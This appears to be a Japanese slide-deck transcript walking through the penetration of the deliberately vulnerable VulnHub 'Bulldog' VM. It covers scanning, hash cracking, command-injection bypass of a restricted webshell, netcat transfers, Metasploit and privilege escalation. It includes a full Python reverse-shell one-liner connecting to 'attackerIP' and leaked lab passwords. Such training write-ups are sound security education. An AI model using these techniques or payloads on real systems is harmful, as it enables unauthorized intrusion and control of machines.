boot2root_kalilinux_bulldog

Transcript

1. サーバ侵入手法 Bulldog

2. BulldogVM • インストール https://www.vulnhub.com/entry/bulldog-1,211/

3. Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads

4. Virtualbox インポート

5. Virtualbox ネットワーク設定

6. Virtualbox ネットワーク設定

7. Virtualbox スナップショット

8. ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP： pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る

9. ポートスキャン ①> nmap -A 192.168.99.101 -A：OSの種類やその他詳細なバージョン情報などを取得可能

10. ポートスキャン

11. サーバスキャン ①> nikto –h 192.168.99.101 -h：対象のIPアドレスを指定するオプション

12. サーバスキャン /dev/

13. ディレクトリスキャン ①> dirb http://192.168.99.101/ /usr/share/wordlists/dirb/ common.txt ディクショナリファイル（/usr/share/wordlists/dirb/common.t xt）を使用してディレクトリのWebサーバー（http://192.168.99. 101/）をスキャンします。 参考：https://tools.kali.org/web-applications/dirb

14. ディレクトリスキャン /admin/

15. http(ポート80)へのアクセス ECサイトっぽいが閉鎖中

16. http(ポート80)へのアクセス ハッキングを受けた的な 事を書いているけど、こ こから特に情報は得れな い。

17. /dev/ sshが可能であることと、WebShell があることが記載されている。 WebShellでは認証が要求される

18. /admin/ 管理者画面へアクセス可能 usrnameとpasswordが必要

19. /dev/ ソース メールアドレスとハッシュ値を取得

20. ハッシュ値のクラッキング ・オンラインのハッシュクラッキングツールを使用する http://crackhash.com/ https://crackstation.net/ nickとsarahのパスワードが わかった

21. 管理者ページへの認証 管理者ページの認証をnick かsarahのどちらかでログイ ンすると、webshellの利用 条件が整う。

22. WebShell • webshellへアクセスすると、使用できるコマンドが制限されて いる。

23. echoコマンド echoコマンドはバック クォートで囲った中身をコ マンドとして実行し、その 結果を出力する。 または、$(…)で囲うことで も実行可能。

24. 「|」パイプ シンプルに「|(パイプ)」で も制限外のコマンドを使用 できることがわかる。

25. ReverseShell • リバースシェルの仕組み ①攻撃コードを送信 ②攻撃に成功し、被攻撃側が攻撃側に接続を行うよう命令が実行され る ③攻撃側が待ち受けているポートに被攻撃側が接続し、制御が奪われ る 参考： http://www.atmarkit.co.jp/ait/articles/1507/01/news023.html

26. ReverseShell • python2系がインストールされているサーバなのでpythonのリ バースシェルを使用する。 shell.py 参考： http://pentestmonkey.net/cheat- sheet/shells/reverse-shell-cheat-sheet import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect

    (("attackerIP",attackerPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p =subprocess.call(["/bin/sh","-i"]);

27. ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker

28. ReverseShell ・リバースシェルの実行 attacker target

29. （参考）ncコマンド ・port scaning（ポートが空いているか確認） % nc -vz [remotehost] 23 ・port knoking

    (ポートを使用してるサービスを確認) % nc [remotehost] 80 ・ファイル転送 (転送先) % nc -lvp 20000 ※標準出力される (転送先) % nc -lvp 20000 > file ※ファイル出力される (転送元) % nc [remotehost] 20000 < file オプション -z ポートスキャニングモード オプション -l リッスンモード オプション -v 情報表示モード オプション -p ポート番号指定

30. msfvenomを使用したReverseShell metasploitの機能であり、ペイロードジェネレータです。 リバースシェルのペイロードを作成できます。 https://www.offensive-security.com/metasploit-unleashed/ms fvenom/

31. ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker

32. Metasploit framework

33. Metasploit framework ・リバースシェルの実行 attacker target

34. Metasploit framework

35. root権限へ昇格

36. パスワード推測 SUPERultH imatePASH SWORDyouH CANTget SUPERultHimatePASHSWORDyouHCANTget SUPERultimatePASSWORDyouCANTget

37. 権限昇格